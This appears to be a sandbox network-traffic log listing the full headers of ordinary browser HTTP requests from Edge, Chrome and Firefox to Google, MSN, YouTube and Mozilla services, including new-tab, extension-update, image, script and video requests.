Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEIucrNAQiG8M0BCPnA1BUY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgSaEMDBGK_Ioa0GIjApxfM_RbeVLD-aT6QwDFmgoIRBVvOBd1rKQXUX0HQ9qj8zGp3AGXVQxLEyboamcNEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEIucrNAQiG8M0BCPnA1BUY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; 1P_JAR=2024-01-17-23
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgSaEMDBGK_Ioa0GIjBA_AWXqE-3waIHSuNeTk9_gqxVHMdGlRT2fj5mZvxjyh51rX04sNWj2bLVV3v25-UyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg; 1P_JAR=2024-01-17-23
Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromiumcrx&prodchannel=&prodversion=117.0.2045.55&lang=en-GB&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D0.0.0.0%26installedby%3Dexternal%26uc HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: ghbmnnjooekpmoecnnnilnnbdlolhkhiX-Goog-Update-Updater: chromiumcrx-117.0.2045.55MS-CV: P7r3S8l0YQIspQC1P1jA/WSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AeKPYwzuPHdG7KXik3HHcL6a-Kv5-SV7bEMYguq8BAeQOhsYur09l08rkkrr-edY1Bt1nCKffdNkY-OZrUTKLWF5ESV93vCk6AcDyeyIE9UUl8AQVch1AMZSmuV-bagaPLO2mX-Kra1bZfrs-ijM4A/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_73_0_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b?rn=1705534516527&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9= HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b2?rn=1705534516527&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9= HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1662cd696fa0501ada252fe1705534517
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA19A5r1.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAcHSdq.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA15KYc7.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /cms/api/am/imageFileData/RW198v3?ver=34e9 HTTP/1.1Host: img-prod-cms-rt-microsoft-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Events/Impression?PID=425882903&TID=700466142&CID=128000000004387349&BID=373206758&PG=IRIS000001.0000000244&TPID=425882903&REQASID=D962A26C9BFA4966FC60431F9E70BE3E&ASID=c7ccf88a56c64ad7bb50b4920a20a146&SLOT=1&REQT=20240117T233519&MA_Score=2&EDGEID=5518710994624701133&DS_EVTID=c7ccf88a56c64ad7bb50b4920a20a146&BCNT=1&PG=IRIS000001.0000000244&UNID=88000244&MAP_TID=146FFD76-B339-4768-A3C1-6927957363FF&NCT=1&ASID=D962A26C9BFA4966FC60431F9E70BE3E&REQASID=D962A26C9BFA4966FC60431F9E70BE3E&ARC=1&EMS=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=154.16.192.193&ID=5518710994624701133&OPTOUTSTATE=256&HTTPS=1&DEVOSVER=10.0.19045.2006&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=19045&DEVOSMINBLD=2006&ABUILD=117.0.5938.150&AMAJOR=117&AMINOR=0&ABLD=5938&APATCH=150&MARKETBASEDCOUNTRY=US&CLR=ESDK&CFMT=&H=0&W=0&FESVER=1.3&ACHANNEL=4&ADEFAB=1&OPSYS=WIN10&UITHEME=LIGHT&PAGECONFIG=547&CHNL=CFD&UIT=E HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=139A33CBE153641D185F27C2E010658F; _EDGE_S=F=1&SID=2D3C0E851380682C1AC01A8C12486911; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/undefined.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /undefined.mp4 HTTP/1.1Host: prod-streaming-video-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-aliveIf-Modified-Since: Fri, 25 Mar 2022 17:45:46 GMTIf-None-Match: "1648230346554"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.youtube.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-site
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/desktop_polymer.vflset/desktop_polymer.js HTTP/1.1Host: www.youtube.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveReferer: https://www.youtube.com/Cookie: __Secure-YEC=CgtvTFRlWWFBZDJDYyjLyKGtBjIKCgJERRIEEgAgZg%3D%3D; VISITOR_PRIVACY_METADATA=CgJERRIEEgAgZg%3D%3D; CONSENT=PENDING+188Sec-Fetch-Dest: scriptSec-Fetch-Mode: no-corsSec-Fetch-Site: same-origin
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js HTTP/1.1Host: www.youtube.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveReferer: https://www.youtube.com/Cookie: __Secure-YEC=CgtvTFRlWWFBZDJDYyjLyKGtBjIKCgJERRIEEgAgZg%3D%3D; VISITOR_PRIVACY_METADATA=CgJERRIEEgAgZg%3D%3D; CONSENT=PENDING+188Sec-Fetch-Dest: scriptSec-Fetch-Mode: no-corsSec-Fetch-Site: same-origin
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js HTTP/1.1Host: www.youtube.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveReferer: https://www.youtube.com/Cookie: __Secure-YEC=CgtvTFRlWWFBZDJDYyjLyKGtBjIKCgJERRIEEgAgZg%3D%3D; VISITOR_PRIVACY_METADATA=CgJERRIEEgAgZg%3D%3D; CONSENT=PENDING+188Sec-Fetch-Dest: scriptSec-Fetch-Mode: no-corsSec-Fetch-Site: same-origin
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/webcomponents-sd.vflset/webcomponents-sd.js HTTP/1.1Host: www.youtube.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveReferer: https://www.youtube.com/Cookie: __Secure-YEC=CgtvTFRlWWFBZDJDYyjLyKGtBjIKCgJERRIEEgAgZg%3D%3D; VISITOR_PRIVACY_METADATA=CgJERRIEEgAgZg%3D%3D; CONSENT=PENDING+188Sec-Fetch-Dest: scriptSec-Fetch-Mode: no-corsSec-Fetch-Site: same-origin
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/intersection-observer.min.vflset/intersection-observer.min.js HTTP/1.1Host: www.youtube.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveReferer: https://www.youtube.com/Cookie: __Secure-YEC=CgtvTFRlWWFBZDJDYyjLyKGtBjIKCgJERRIEEgAgZg%3D%3D; VISITOR_PRIVACY_METADATA=CgJERRIEEgAgZg%3D%3D; CONSENT=PENDING+188Sec-Fetch-Dest: scriptSec-Fetch-Mode: no-corsSec-Fetch-Site: same-origin
Source: global traffic	HTTP traffic detected: GET /generate_204 HTTP/1.1Host: i.ytimg.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveReferer: https://www.youtube.com/Sec-Fetch-Dest: emptySec-Fetch-Mode: no-corsSec-Fetch-Site: cross-site
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/scheduler.vflset/scheduler.js HTTP/1.1Host: www.youtube.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveReferer: https://www.youtube.com/Cookie: __Secure-YEC=CgtvTFRlWWFBZDJDYyjLyKGtBjIKCgJERRIEEgAgZg%3D%3D; VISITOR_PRIVACY_METADATA=CgJERRIEEgAgZg%3D%3D; CONSENT=PENDING+188Sec-Fetch-Dest: scriptSec-Fetch-Mode: no-corsSec-Fetch-Site: same-origin
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.js HTTP/1.1Host: www.youtube.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveReferer: https://www.youtube.com/Cookie: __Secure-YEC=CgtvTFRlWWFBZDJDYyjLyKGtBjIKCgJERRIEEgAgZg%3D%3D; VISITOR_PRIVACY_METADATA=CgJERRIEEgAgZg%3D%3D; CONSENT=PENDING+188Sec-Fetch-Dest: scriptSec-Fetch-Mode: no-corsSec-Fetch-Site: same-origin
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/www-tampering.vflset/www-tampering.js HTTP/1.1Host: www.youtube.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveReferer: https://www.youtube.com/Cookie: __Secure-YEC=CgtvTFRlWWFBZDJDYyjLyKGtBjIKCgJERRIEEgAgZg%3D%3D; VISITOR_PRIVACY_METADATA=CgJERRIEEgAgZg%3D%3D; CONSENT=PENDING+188Sec-Fetch-Dest: scriptSec-Fetch-Mode: no-corsSec-Fetch-Site: same-origin
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en HTTP/1.1Host: accounts.google.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveReferer: https://www.youtube.com/Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: iframeSec-Fetch-Mode: navigateSec-Fetch-Site: cross-site
Source: global traffic	HTTP traffic detected: GET /InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&passive=true&service=youtube&uilel=3&ifkv=ASKXGp1L_F8PR0t8Ez4lPiTxJ8zl4bnSI06UunK8lQtrc6bGUU5_u7QgGVGeBZagTldH0loxJguB5g HTTP/1.1Host: accounts.google.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: https://www.youtube.com/Connection: keep-aliveCookie: __Host-GAPS=1:h6GRwma_TJ4Qnbn-CbBoGF4joABsWA:Q_agaXYR1B1-XA-HUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: iframeSec-Fetch-Mode: navigateSec-Fetch-Site: cross-site
Source: global traffic	HTTP traffic detected: GET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1Host: www.google.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,/Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveReferer: https://accounts.google.com/Sec-Fetch-Dest: imageSec-Fetch-Mode: no-corsSec-Fetch-Site: same-site
Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=1346786392&ei=iLfHahFDxq7UY-1BtTnrg0m&ip=66.6.23.50&id=o-AFwJ3Bh3iSVhOC0GhDdF1oQ6Si2JwU3MmMTjAUsspsqww&itag=18&source=youtube&requiressl=yes&mh=X6&mm=293%2C30652%2C86954&mn=JS760%2C4L9T0%2CDVwMY&ms=JS760%2C4L9T0%2CDVwMY&mv=8&mvi=4&pl=60&ctier=L&initcwndbps=8341635&siu=4&spc=YMhnsDo-V3iaULrnWPEUxDVS41lomut8O73b0S072ZkZ&vprv=4&svpuc=4&mime=video%2Fmp4&ns=qwKoJk1u7yhLIsJaHJ9fuFR7&cnr=60&ratebypass=yes&dur=36949506&lmt=6219481202467914&mt=1346786392&fvip=3&c=WEB&txp=8341635&n=dJjgJ7l5Ht-sNq-c&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=80QE5JUe5UCVAfqCvcpOPCURHfw1y6UcEf5nosyOcjZiCW8sAKnSfn0ER1dyL3cW5WreMR5EXgF0EagtowxvFgRbC0Ub9VASPrwelhlRlpq0&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=80QE5JUe5UCVAfqCvcpOPCURHfw1y6UcEf5nosyOcjZiCW8sAKnSfn0ER1dyL3cW5WreMR5EXgF0EagtowxvFgRbC0Ub9VASPrwelhlRlpq0 HTTP/1.1Host: rr2---sn-q4fl6nz6.googlevideo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: https://www.youtube.com/Origin: https://www.youtube.comConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-sitePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /videoplayback?expire=1346786392&ei=iLfHahFDxq7UY-1BtTnrg0m&ip=66.6.23.50&id=o-AFwJ3Bh3iSVhOC0GhDdF1oQ6Si2JwU3MmMTjAUsspsqww&itag=18&source=youtube&requiressl=yes&mh=X6&mm=293%2C30652%2C86954&mn=JS760%2C4L9T0%2CDVwMY&ms=JS760%2C4L9T0%2CDVwMY&mv=8&mvi=4&pl=60&initcwndbps=8341635&siu=4&spc=YMhnsDo-V3iaULrnWPEUxDVS41lomut8O73b0S072ZkZ&vprv=4&svpuc=4&mime=video%2Fmp4&ns=qwKoJk1u7yhLIsJaHJ9fuFR7&cnr=60&ratebypass=yes&dur=36949506&lmt=6219481202467914&mt=1346786392&fvip=3&c=WEB&txp=8341635&n=dJjgJ7l5Ht-sNq-c&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=80QE5JUe5UCVAfqCvcpOPCURHfw1y6UcEf5nosyOcjZiCW8sAKnSfn0ER1dyL3cW5WreMR5EXgF0EagtowxvFgRbC0Ub9VASPrwelhlRlpq0&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=80QE5JUe5UCVAfqCvcpOPCURHfw1y6UcEf5nosyOcjZiCW8sAKnSfn0ER1dyL3cW5WreMR5EXgF0EagtowxvFgRbC0Ub9VASPrwelhlRlpq0 HTTP/1.1Host: rr2---sn-q4fl6nz6.googlevideo.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: https://www.youtube.com/Origin: https://www.youtube.comConnection: keep-aliveSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-sitePragma: no-cacheCache-Control: no-cache
